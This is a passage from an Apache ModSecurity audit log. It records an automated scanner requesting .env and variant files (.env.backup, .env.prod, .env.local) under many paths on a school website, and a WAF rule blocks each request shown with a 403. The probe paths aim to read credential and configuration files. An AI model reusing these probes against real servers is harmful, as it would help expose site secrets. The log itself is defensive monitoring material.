Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --77867956-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77867956-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903649936 631 (- - -) Stopwatch2: 1745151903649936 631; combined=227, p1=197, p2=0, p3=0, p4=0, p5=29, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77867956-Z-- --3bcd5409-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4gAAANE 103.236.140.4 38356 103.236.140.4 8181 --3bcd5409-B-- GET /home/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --3bcd5409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bcd5409-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903721728 792 (- - -) Stopwatch2: 1745151903721728 792; combined=313, p1=281, p2=0, p3=0, p4=0, p5=32, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bcd5409-Z-- --d6afde47-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4wAAANg 103.236.140.4 38358 103.236.140.4 8181 --d6afde47-B-- GET /main/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d6afde47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6afde47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903792726 682 (- - -) Stopwatch2: 1745151903792726 682; combined=294, p1=260, p2=0, p3=0, p4=0, p5=33, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6afde47-Z-- --d2690c1e-A-- [20/Apr/2025:19:25:03 +0700] aATnn1u16wJWB6g0mU8NpQAAAA0 103.236.140.4 38360 103.236.140.4 8181 --d2690c1e-B-- GET /pemerintah/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d2690c1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2690c1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903863636 688 (- - -) Stopwatch2: 1745151903863636 688; combined=298, p1=256, p2=0, p3=0, p4=0, p5=41, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2690c1e-Z-- --bfd5b430-A-- [20/Apr/2025:19:25:03 +0700] aATnn1Tf0pL9EQC7JDUZ2AAAAEs 103.236.140.4 38362 103.236.140.4 8181 --bfd5b430-B-- GET /api2/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --bfd5b430-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfd5b430-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903934988 760 (- - -) Stopwatch2: 1745151903934988 760; combined=293, p1=247, p2=0, p3=0, p4=0, p5=46, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfd5b430-Z-- --e6e1c672-A-- [20/Apr/2025:19:25:04 +0700] aATnoFu16wJWB6g0mU8NpgAAAAU 103.236.140.4 38364 103.236.140.4 8181 --e6e1c672-B-- GET /api3/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --e6e1c672-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6e1c672-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151904005097 748 (- - -) Stopwatch2: 1745151904005097 748; combined=297, p1=251, p2=0, p3=0, p4=0, p5=45, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6e1c672-Z-- --45e4db5a-A-- [20/Apr/2025:19:25:04 +0700] aATnoFTf0pL9EQC7JDUZ2QAAAFc 103.236.140.4 38366 103.236.140.4 8181 --45e4db5a-B-- GET /webs/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --45e4db5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45e4db5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151904076868 797 (- - -) Stopwatch2: 1745151904076868 797; combined=322, p1=278, p2=0, p3=0, p4=0, p5=44, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45e4db5a-Z-- --b003e624-A-- [20/Apr/2025:19:25:04 +0700] aATnoMTCDeBrh52UaHS-SQAAAJc 103.236.140.4 38368 103.236.140.4 8181 --b003e624-B-- GET /asset/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --b003e624-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b003e624-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151904147872 708 (- - -) Stopwatch2: 1745151904147872 708; combined=262, p1=226, p2=0, p3=0, p4=0, p5=36, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b003e624-Z-- --d0111454-A-- [20/Apr/2025:19:25:04 +0700] aATnoFTf0pL9EQC7JDUZ3AAAAFE 103.236.140.4 38378 103.236.140.4 8181 --d0111454-B-- GET /cp/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d0111454-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0111454-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151904993278 935 (- - -) Stopwatch2: 1745151904993278 935; combined=386, p1=338, p2=0, p3=0, p4=0, p5=48, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0111454-Z-- --66824a73-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NpwAAAAM 103.236.140.4 38380 103.236.140.4 8181 --66824a73-B-- GET /sources/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --66824a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66824a73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905064354 674 (- - -) Stopwatch2: 1745151905064354 674; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66824a73-Z-- --83c86872-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqAAAABU 103.236.140.4 38382 103.236.140.4 8181 --83c86872-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --83c86872-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83c86872-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905134682 670 (- - -) Stopwatch2: 1745151905134682 670; combined=256, p1=225, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83c86872-Z-- --a011174d-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqQAAAAo 103.236.140.4 38384 103.236.140.4 8181 --a011174d-B-- GET /.env.local HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --a011174d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a011174d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905204711 740 (- - -) Stopwatch2: 1745151905204711 740; combined=315, p1=265, p2=0, p3=0, p4=0, p5=50, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a011174d-Z-- --4e177b7c-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqgAAAAs 103.236.140.4 38386 103.236.140.4 8181 --4e177b7c-B-- GET /script/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --4e177b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e177b7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905274743 808 (- - -) Stopwatch2: 1745151905274743 808; combined=312, p1=268, p2=0, p3=0, p4=0, p5=44, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e177b7c-Z-- --21f7d77c-A-- [20/Apr/2025:19:25:05 +0700] aATnocTCDeBrh52UaHS-SgAAAJE 103.236.140.4 38388 103.236.140.4 8181 --21f7d77c-B-- GET /blog/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --21f7d77c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21f7d77c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905345913 787 (- - -) Stopwatch2: 1745151905345913 787; combined=317, p1=282, p2=0, p3=0, p4=0, p5=34, sr=112, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21f7d77c-Z-- --83a05a54-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqwAAAAE 103.236.140.4 38390 103.236.140.4 8181 --83a05a54-B-- GET /.env.prod HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --83a05a54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83a05a54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905415991 726 (- - -) Stopwatch2: 1745151905415991 726; combined=260, p1=216, p2=0, p3=0, p4=0, p5=44, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83a05a54-Z-- --36c76101-A-- [20/Apr/2025:19:25:05 +0700] aATnocTCDeBrh52UaHS-SwAAAJQ 103.236.140.4 38392 103.236.140.4 8181 --36c76101-B-- GET /storage/.env.local HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --36c76101-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36c76101-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905490210 680 (- - -) Stopwatch2: 1745151905490210 680; combined=281, p1=250, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36c76101-Z-- --8335fe0c-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NrAAAABQ 103.236.140.4 38394 103.236.140.4 8181 --8335fe0c-B-- GET /enviroments/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --8335fe0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8335fe0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905559649 750 (- - -) Stopwatch2: 1745151905559649 750; combined=303, p1=261, p2=0, p3=0, p4=0, p5=42, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8335fe0c-Z-- --6fce6a4f-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NrQAAAAQ 103.236.140.4 38396 103.236.140.4 8181 --6fce6a4f-B-- GET /application/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --6fce6a4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fce6a4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905630209 756 (- - -) Stopwatch2: 1745151905630209 756; combined=327, p1=294, p2=0, p3=0, p4=0, p5=33, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fce6a4f-Z-- --49dc2d18-A-- [20/Apr/2025:19:25:05 +0700] aATnocTCDeBrh52UaHS-TAAAAI0 103.236.140.4 38402 103.236.140.4 8181 --49dc2d18-B-- GET /icons/.env/.env.development HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --49dc2d18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49dc2d18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905700857 691 (- - -) Stopwatch2: 1745151905700857 691; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49dc2d18-Z-- --979fe60c-A-- [20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr5QAAAMY 103.236.140.4 38404 103.236.140.4 8181 --979fe60c-B-- GET /.env.backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --979fe60c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --979fe60c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file 